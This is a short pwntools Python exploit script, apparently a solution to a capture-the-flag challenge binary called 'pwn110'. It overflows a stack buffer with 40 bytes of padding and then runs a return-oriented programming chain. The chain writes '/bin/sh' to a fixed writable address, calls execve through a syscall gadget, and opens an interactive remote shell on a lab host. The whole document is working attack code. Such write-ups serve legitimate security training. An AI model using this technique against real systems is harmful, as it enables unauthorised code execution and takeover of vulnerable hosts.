#!/usr/bin/python3
from pwn import *

# Loading the binary also sets the pwntools context (arch/bits) for p64().
# The chain below relies on fixed addresses, which only works for a
# non-PIE layout — confirm with checksec before reusing any of this.
context.binary = target = ELF("./pwn110", checksec=False)

# Addresses taken from the binary. The register setup in the chain implies
# the mov gadget stores rsi into [rdi] — verify by disassembly.
GADGETS = {
    "pop_rdi": 0x40191a,
    "pop_rsi": 0x40f4de,
    "pop_rax": 0x4497d7,
    "pop_rdx": 0x40181f,
    "mov_q_ptr_rsi_rdi": 0x44629f,
    "syscall": 0x4173d4,
}
SCRATCH_ADDR = 0x4c3500  # writable location used to stage the "/bin/sh" string
PADDING_LEN = 40         # bytes from the buffer start to the saved return address
SYS_EXECVE = 59


def build_payload():
    """Return padding plus the chain: stage "/bin/sh" at SCRATCH_ADDR, then execve."""
    # Mixed list: ints are packed as 8-byte little-endian, bytes are used as-is.
    items = [
        GADGETS["pop_rdi"], SCRATCH_ADDR,
        GADGETS["pop_rsi"], b"/bin/sh\0",
        GADGETS["mov_q_ptr_rsi_rdi"],
        GADGETS["pop_rax"], SYS_EXECVE,
        GADGETS["pop_rsi"], 0,
        GADGETS["pop_rdx"], 0,
        GADGETS["syscall"],
    ]
    packed = [item if isinstance(item, bytes) else p64(item) for item in items]
    return b"A" * PADDING_LEN + b"".join(packed)


def main():
    """Connect, deliver the payload on one line, then hand the session to the user."""
    # Swap remote() for process() to run against a local copy of the binary.
    conn = remote("10.10.42.182", 9010)
    conn.sendline(build_payload())
    conn.interactive()


main()